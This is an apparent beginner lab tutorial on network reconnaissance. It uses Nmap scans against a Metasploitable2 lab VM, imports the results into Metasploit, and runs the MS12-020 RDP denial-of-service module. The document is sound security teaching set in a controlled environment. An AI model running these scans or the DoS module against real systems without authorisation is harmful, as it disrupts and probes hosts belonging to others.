Network Scanning with Nmap and Metasploit

CybersecurityCybersecurityBeginner
Practice Now

Introduction

In this lab, you will learn how to use Nmap and Metasploit for network scanning and vulnerability analysis. Nmap (Network Mapper) is a powerful open-source utility for network discovery and security auditing, while Metasploit is a widely used penetration testing framework that includes a variety of exploitation tools and payloads.

The goal of this lab is to provide you with hands-on experience in using Nmap to perform various types of scans, analyzing the results, and leveraging Metasploit to further explore potential vulnerabilities on a target system.


Skills Graph

%%%%{init: {'theme':'neutral'}}%%%% flowchart RL cybersecurity(("`Cybersecurity`")) -.-> cybersecurity/NmapGroup(["`Nmap`"]) cybersecurity/NmapGroup -.-> cybersecurity/nmap_save_output("`Nmap Save Output to File`") cybersecurity/NmapGroup -.-> cybersecurity/nmap_port_scanning("`Nmap Port Scanning Methods`") cybersecurity/NmapGroup -.-> cybersecurity/nmap_host_discovery("`Nmap Host Discovery Techniques`") cybersecurity/NmapGroup -.-> cybersecurity/nmap_scan_types("`Nmap Scan Types and Techniques`") subgraph Lab Skills cybersecurity/nmap_save_output -.-> lab-416120{{"`Network Scanning with Nmap and Metasploit`"}} cybersecurity/nmap_port_scanning -.-> lab-416120{{"`Network Scanning with Nmap and Metasploit`"}} cybersecurity/nmap_host_discovery -.-> lab-416120{{"`Network Scanning with Nmap and Metasploit`"}} cybersecurity/nmap_scan_types -.-> lab-416120{{"`Network Scanning with Nmap and Metasploit`"}} end

Setting up the Environment

In this step, you will set up the lab environment by launching the Kali Linux container and the Metasploitable2 virtual machine.

sudo virsh start Metasploitable2

Test if the virtual machine is up and running by pinging it:

ping 192.168.122.102

Next, start the Kali Linux container and enter its bash environment:

docker run -ti --network host b5b709a49cd5 bash

Test the virtual network connection in the Kali container, use Ctrl-C to exit ping:

ping 192.168.122.102

Basic Nmap Usage

In this step, you will learn how to use Nmap for basic scanning tasks, such as host discovery, port scanning, version detection, and operating system detection.

Perform a comprehensive scan by running the following command:

nmap -T4 -A 192.168.122.102

Scan the host discovery by running the following command:

nmap -T4 -sn 192.168.122.102

Perform a port scan by running the following command:

nmap -T4 192.168.122.102

Perform the operating system detection by running the following command:

nmap -T4 -O 192.168.122.102

The -T4 option sets the timing template to an aggressive scan, while the -A option enables OS detection, version scanning, script scanning, and traceroute. The -sn option performs a simple host discovery scan, and the -O option attempts to detect the remote operating system.

Advanced Nmap Usage

In this step, you will explore more advanced Nmap scanning techniques, such as scanning entire subnets, specific port ranges, and specify network interface.

Scan an entire subnet by by running the following command:

nmap 127.0.0.1/24

Scan specific ports by running the following command:

nmap -p80,22,66 127.0.0.1

List local network interfaces by running the following command:

nmap --iflist

Specify network interface by running the following command:

nmap -e eth0 127.0.0.1

These advanced techniques allow you to fine-tune your scans and gather more detailed information about the target network or hosts.

Importing Nmap Scan Results into Metasploit

In this step, you will learn how to import Nmap scan results into Metasploit for further analysis and exploitation.

  1. Perform a comprehensive scan and save the output to an XML file by running the following command, and make sure to put the XML file in the home directory ~/, this step might take some time:
nmap -sV -Pn -oX ~/shiyanlou.xml 192.168.122.102/24
  1. Start the Metasploit console:
cd ~
service postgresql start
msfdb init
msfconsole
  1. Import the XML file into Metasploit by running the following command in Metasploit console:
db_import shiyanlou.xml
  1. View the imported services by running the following command in Metasploit console:
services
  1. Press Ctrl+D to quit the Metasploit console then start the inspection

By importing the Nmap scan results into Metasploit, you can leverage the powerful tools and modules available in the Metasploit framework to analyze and potentially exploit vulnerabilities on the target system.

Using Modules in Metasploit

In this step, you will learn how to search for and use modules within the Metasploit framework.

  1. First of all, if you are not in the Metasploit console, you should start the Metasploit console:
cd ~
msfconsole
  1. Now, you can search for modules using the search command in Metasploit console:
search ms12-020
  1. To use a module in Metasploit console:
use auxiliary/dos/windows/rdp/ms12_020_maxchannelids
  1. Show available options for the module in Metasploit console:
show options
  1. Set required options in Metasploit console:
set RHOST 192.168.122.102
  1. Run the module in Metasploit console:
exploit
  1. Press Ctrl+D to quit the Metasploit console then start the inspection

Metasploit provides a wide range of modules for various purposes, such as exploits, payloads, auxiliary modules, and more. By searching for and using the appropriate module, you can attempt to exploit vulnerabilities or perform other actions on the target system.

Summary

In this lab, you learned how to use Nmap for network scanning and information gathering, as well as how to import the scan results into Metasploit for further analysis and exploitation. You gained hands-on experience with various Nmap scanning techniques, including host discovery, port scanning, version detection, and operating system detection. Additionally, you learned how to search for and use modules within the Metasploit framework to potentially exploit vulnerabilities on the target system.

Throughout the lab, you practiced essential skills for penetration testing, such as setting up a controlled environment, performing reconnaissance, and analyzing potential vulnerabilities. These skills are crucial in the field of cybersecurity and will help you develop a deeper understanding of network security concepts and ethical hacking techniques.

Other Cybersecurity Tutorials you may like